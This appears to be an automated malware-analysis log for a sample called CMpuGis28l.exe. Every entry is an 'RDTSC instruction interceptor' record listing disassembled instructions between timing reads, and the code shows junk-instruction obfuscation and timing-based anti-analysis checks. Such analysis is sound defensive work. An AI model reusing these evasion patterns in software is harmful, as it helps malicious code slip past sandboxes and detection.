Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730933 second address: 7730997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c jmp 00007F9334BA002Eh 0x00000011 mov dword ptr [esi+3Ch], eax 0x00000014 jmp 00007F9334BA0030h 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c jmp 00007F9334BA0030h 0x00000021 mov dword ptr [esi+40h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F9334BA0037h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730997 second address: 773099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773099D second address: 77309A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77309A1 second address: 77309A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77309A5 second address: 77309B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77309B9 second address: 77309BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77309BD second address: 77309C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77309C3 second address: 77309F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F9334DAF99Dh 0x0000000b sbb si, 6B36h 0x00000010 jmp 00007F9334DAF9A1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b pushad 0x0000001c mov cl, 96h 0x0000001e push eax 0x0000001f push edx 0x00000020 mov bl, 8Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730AC5 second address: 7730AF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9334BA0038h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730AF8 second address: 7730AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730AFC second address: 7730B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730B02 second address: 7730BA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9334DAF99Ch 0x00000008 call 00007F9334DAF9A2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 js 00007F93A44AE532h 0x00000017 jmp 00007F9334DAF9A1h 0x0000001c mov eax, dword ptr [ebp-0Ch] 0x0000001f jmp 00007F9334DAF99Eh 0x00000024 mov dword ptr [esi+04h], eax 0x00000027 jmp 00007F9334DAF9A0h 0x0000002c lea eax, dword ptr [ebx+78h] 0x0000002f jmp 00007F9334DAF9A0h 0x00000034 push 00000001h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b pushfd 0x0000003c jmp 00007F9334DAF9A3h 0x00000041 jmp 00007F9334DAF9A3h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730BA5 second address: 7730BBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0034h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730BBD second address: 7730BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730BC1 second address: 7730BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ebx, ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730BCF second address: 7730BDF instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730BDF second address: 7730BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730BE5 second address: 7730BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730C68 second address: 7730C80 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 3A819015h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a js 00007F93A429EA6Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 mov dh, 39h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730C80 second address: 7730CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, CC94h 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp-04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9334DAF9A2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730CA3 second address: 7730CC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9334BA0030h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730CC9 second address: 7730CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730CCF second address: 7730D2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9334BA002Ch 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007F9334BA002Bh 0x0000000f or ecx, 73A973EEh 0x00000015 jmp 00007F9334BA0039h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e lea eax, dword ptr [ebx+70h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9334BA0038h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730D2D second address: 7730D33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730D33 second address: 7730D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 00000001h 0x0000000d pushad 0x0000000e call 00007F9334BA002Eh 0x00000013 mov dx, cx 0x00000016 pop esi 0x00000017 mov eax, ebx 0x00000019 popad 0x0000001a push ebp 0x0000001b pushad 0x0000001c movzx esi, bx 0x0000001f mov edi, 45472ED4h 0x00000024 popad 0x00000025 mov dword ptr [esp], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9334BA0036h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730D7C second address: 7730DCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007F9334DAF9A6h 0x00000011 nop 0x00000012 jmp 00007F9334DAF9A0h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov si, bx 0x0000001c movsx edi, ax 0x0000001f popad 0x00000020 nop 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9334DAF99Bh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E0B second address: 7730E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E11 second address: 7730E17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E17 second address: 7730E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730E1B second address: 7730EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b jmp 00007F9334DAF9A2h 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 test edi, edi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9334DAF9A3h 0x0000001d jmp 00007F9334DAF9A3h 0x00000022 popfd 0x00000023 mov dh, al 0x00000025 popad 0x00000026 js 00007F93A44AE1DBh 0x0000002c jmp 00007F9334DAF99Bh 0x00000031 mov eax, dword ptr [ebp-14h] 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F9334DAF9A4h 0x0000003b sub cx, 0E58h 0x00000040 jmp 00007F9334DAF99Bh 0x00000045 popfd 0x00000046 mov bx, ax 0x00000049 popad 0x0000004a mov ecx, esi 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F9334DAF9A0h 0x00000053 or si, 98B8h 0x00000058 jmp 00007F9334DAF99Bh 0x0000005d popfd 0x0000005e mov bx, ax 0x00000061 popad 0x00000062 mov dword ptr [esi+0Ch], eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jmp 00007F9334DAF9A7h 0x0000006d mov ax, 1ACFh 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730EF4 second address: 7730FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334BA002Bh 0x00000009 and si, CFDEh 0x0000000e jmp 00007F9334BA0039h 0x00000013 popfd 0x00000014 call 00007F9334BA0030h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov edx, 76EB06ECh 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9334BA0037h 0x00000029 jmp 00007F9334BA0033h 0x0000002e popfd 0x0000002f mov bx, si 0x00000032 popad 0x00000033 sub eax, eax 0x00000035 jmp 00007F9334BA002Bh 0x0000003a lock cmpxchg dword ptr [edx], ecx 0x0000003e jmp 00007F9334BA0036h 0x00000043 pop edi 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F9334BA0037h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730FAD second address: 7730FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730FB3 second address: 7730FE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9334BA002Dh 0x00000011 sub cl, FFFFFF96h 0x00000014 jmp 00007F9334BA0031h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ecx, 1E32C75Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730FE8 second address: 7731075 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 2AD97C59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jne 00007F93A44AE080h 0x00000010 jmp 00007F9334DAF9A4h 0x00000015 mov edx, dword ptr [ebp+08h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F9334DAF99Eh 0x0000001f add eax, 0BA66618h 0x00000025 jmp 00007F9334DAF99Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F9334DAF9A8h 0x00000031 and si, D078h 0x00000036 jmp 00007F9334DAF99Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov eax, dword ptr [esi] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9334DAF9A5h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731075 second address: 773107A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773107A second address: 77310C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F9334DAF99Dh 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [edx], eax 0x0000000f jmp 00007F9334DAF9A7h 0x00000014 mov eax, dword ptr [esi+04h] 0x00000017 pushad 0x00000018 mov bx, cx 0x0000001b mov ebx, ecx 0x0000001d popad 0x0000001e mov dword ptr [edx+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov edi, 32D1690Ah 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77310C0 second address: 77310D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77310D1 second address: 77310F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c movsx edx, ax 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 mov dword ptr [edx+08h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F9334DAF99Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77310F5 second address: 7731116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov di, 75BEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9334BA0030h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731116 second address: 7731145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007F9334DAF9A6h 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731145 second address: 77311F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9334BA002Ah 0x0000000a add si, F918h 0x0000000f jmp 00007F9334BA002Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9334BA0036h 0x0000001d and esi, 301AE378h 0x00000023 jmp 00007F9334BA002Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F9334BA0038h 0x0000002f and si, 7DD8h 0x00000034 jmp 00007F9334BA002Bh 0x00000039 popfd 0x0000003a popad 0x0000003b popad 0x0000003c mov dword ptr [edx+10h], eax 0x0000003f jmp 00007F9334BA0036h 0x00000044 mov eax, dword ptr [esi+14h] 0x00000047 jmp 00007F9334BA0030h 0x0000004c mov dword ptr [edx+14h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F9334BA002Ah 0x00000058 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77311F9 second address: 77311FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77311FD second address: 7731203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731203 second address: 773128D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 sbb ecx, 49D601C8h 0x0000000f jmp 00007F9334DAF99Bh 0x00000014 popfd 0x00000015 call 00007F9334DAF9A8h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov eax, dword ptr [esi+18h] 0x00000021 jmp 00007F9334DAF9A1h 0x00000026 mov dword ptr [edx+18h], eax 0x00000029 pushad 0x0000002a pushad 0x0000002b call 00007F9334DAF99Ah 0x00000030 pop eax 0x00000031 mov dh, C4h 0x00000033 popad 0x00000034 pushfd 0x00000035 jmp 00007F9334DAF99Ch 0x0000003a or al, FFFFFFB8h 0x0000003d jmp 00007F9334DAF99Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov eax, dword ptr [esi+1Ch] 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773128D second address: 77312BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F9334BA0031h 0x0000000a adc eax, 4F02FC56h 0x00000010 jmp 00007F9334BA0031h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77312BC second address: 773138E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [edx+1Ch], eax 0x0000000f jmp 00007F9334DAF99Bh 0x00000014 mov eax, dword ptr [esi+20h] 0x00000017 jmp 00007F9334DAF9A6h 0x0000001c mov dword ptr [edx+20h], eax 0x0000001f pushad 0x00000020 movzx eax, bx 0x00000023 mov ecx, edx 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+24h] 0x00000029 jmp 00007F9334DAF9A5h 0x0000002e mov dword ptr [edx+24h], eax 0x00000031 pushad 0x00000032 mov ax, D313h 0x00000036 call 00007F9334DAF9A8h 0x0000003b push ecx 0x0000003c pop ebx 0x0000003d pop ecx 0x0000003e popad 0x0000003f mov eax, dword ptr [esi+28h] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007F9334DAF9A6h 0x0000004b adc cx, 7FF8h 0x00000050 jmp 00007F9334DAF99Bh 0x00000055 popfd 0x00000056 pushfd 0x00000057 jmp 00007F9334DAF9A8h 0x0000005c xor si, 5A58h 0x00000061 jmp 00007F9334DAF99Bh 0x00000066 popfd 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773138E second address: 77313D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4BC2D57Ah 0x00000008 pushfd 0x00000009 jmp 00007F9334BA002Bh 0x0000000e add cl, 0000001Eh 0x00000011 jmp 00007F9334BA0039h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+28h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9334BA002Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313D4 second address: 77313E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313E4 second address: 77313E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313E8 second address: 77313F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [esi+2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77313F9 second address: 7731411 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731411 second address: 7731417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731417 second address: 773141B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773141B second address: 773141F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773141F second address: 773149A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e mov dh, 3Ah 0x00000010 popad 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 jmp 00007F9334BA002Ah 0x0000001a mov word ptr [edx+30h], ax 0x0000001e jmp 00007F9334BA0030h 0x00000023 mov ax, word ptr [esi+32h] 0x00000027 jmp 00007F9334BA0030h 0x0000002c mov word ptr [edx+32h], ax 0x00000030 jmp 00007F9334BA0030h 0x00000035 mov eax, dword ptr [esi+34h] 0x00000038 pushad 0x00000039 mov ecx, 1D4DC32Dh 0x0000003e call 00007F9334BA002Ah 0x00000043 mov ah, 90h 0x00000045 pop ebx 0x00000046 popad 0x00000047 mov dword ptr [edx+34h], eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773149A second address: 77314A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77314A9 second address: 77314AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77314AF second address: 77314B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 77314B3 second address: 7731519 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e pushad 0x0000000f jmp 00007F9334BA002Dh 0x00000014 push ecx 0x00000015 pushfd 0x00000016 jmp 00007F9334BA0037h 0x0000001b and eax, 220CEC1Eh 0x00000021 jmp 00007F9334BA0039h 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 jne 00007F93A429E233h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 push eax 0x00000033 pop ebx 0x00000034 movzx esi, dx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731519 second address: 773152A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773152A second address: 773154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c jmp 00007F9334BA002Dh 0x00000011 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773154D second address: 7731551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731551 second address: 7731557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7731557 second address: 773155D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773155D second address: 7731561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
